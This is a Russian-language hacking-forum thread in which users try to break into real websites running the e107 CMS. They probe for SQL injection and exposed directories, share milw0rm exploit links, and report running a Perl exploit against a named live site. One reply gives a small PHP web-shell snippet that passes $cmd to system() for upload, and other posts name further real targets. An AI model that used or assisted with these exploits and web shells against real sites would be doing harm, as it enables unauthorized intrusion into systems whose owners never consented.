Форум АНТИЧАТ - движок от http://www.e107.ru/

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - движок от http://www.e107.ru/ (https://forum.antichat.xyz/showthread.php?t=9936)

движок от http://www.e107.ru/

Хотелеось бы ипытать его на прочность
я конечно приметил уже пару сайтов(2 как минимум) на которых стоит этот движок и я так же хочу скаать вам что он очень популярен...
первое что я конечно сделел это испытание на скьюл иньекцию... не пошло пишет акцес дениед, но зато можно просматривать почти все директории :
e107_admin,e107_docs,e107_files,e107_handlers,e107 _images,e107_languages,e107_plugins,e107_themes
но в них я не нашол чего-нибуть интересного.Нельзя просматривать содержимое www.sait.net/e107_config
так как есть фаил e107.htaccess который препядствует просмотру . Но все же если обратиться к сайту так http://www.sait.net/e107_plugins/aut...�ой_текс то этот "любой_текст" будет напечатан но это не дает ничего больше тоесть скрипт только печатает и ничего более...
и еще очень странно на мой взгляд предается значение id оно пере дается чере точку например id.1

Tikson, в след. раз пиши так, чтобы твой урл не был реальным сайтом..) например,
http://[example]/e107_plagins/etc..

Теперь по теме.
Вот тебе 2 эксплоита).
http://milw0rm.com/id.php?id=1106
http://milw0rm.com/id.php?id=704

Rebz спасибо =)))
ps я думал уж что мне не помогут, спасибо, большой респект тебе и всему античату =)
СПАСИБО!!!

Rebz я использовал сплоит => http://milw0rm.com/id.php?id=704
есть вопрос что значит "b4d upload!!"
я все делал как в сплоите написано
perl 1\e107.pl www.nradio.ru
1 - это папка в которой у меня лежит сплоит
и вмне значит выводится сообщение
## www.nradio.ru
## b4d upload!!

что это начит??? и как от этого танцевать????

гык, если честно, то не знаю..) надо исходный код смотреть.. возможно там стоит небольшая защита.. а возможно версия e107 пропатчена..

Помоему та стоит закачка файла с адреса http://www.lapropinacultural.com.ar/...sert_image.php
но выдаётся какая-то ошибка....
Попробуй зафигачь свой и в файле пропиши
<?
echo "<pre>";
sysem($cmd);
echo "</pre>";
?>

Мож получится.

это в картинке можно писать??? там вообщето нельзя фаилы закачивать

http://nradio-ru.mitos.ru/e107_handl...ger/images.php
картинку удалить у меня не получилось((( может дело в этом

Да... возможно, они на папочку upload поставили права не 777. -)
В общем, как вариант, можете на др.сайте попробовать.. если будет такая же ошибка выскакивать, значит дело в сплоите).

Kond4r как ты зделал это?????? как залил и что????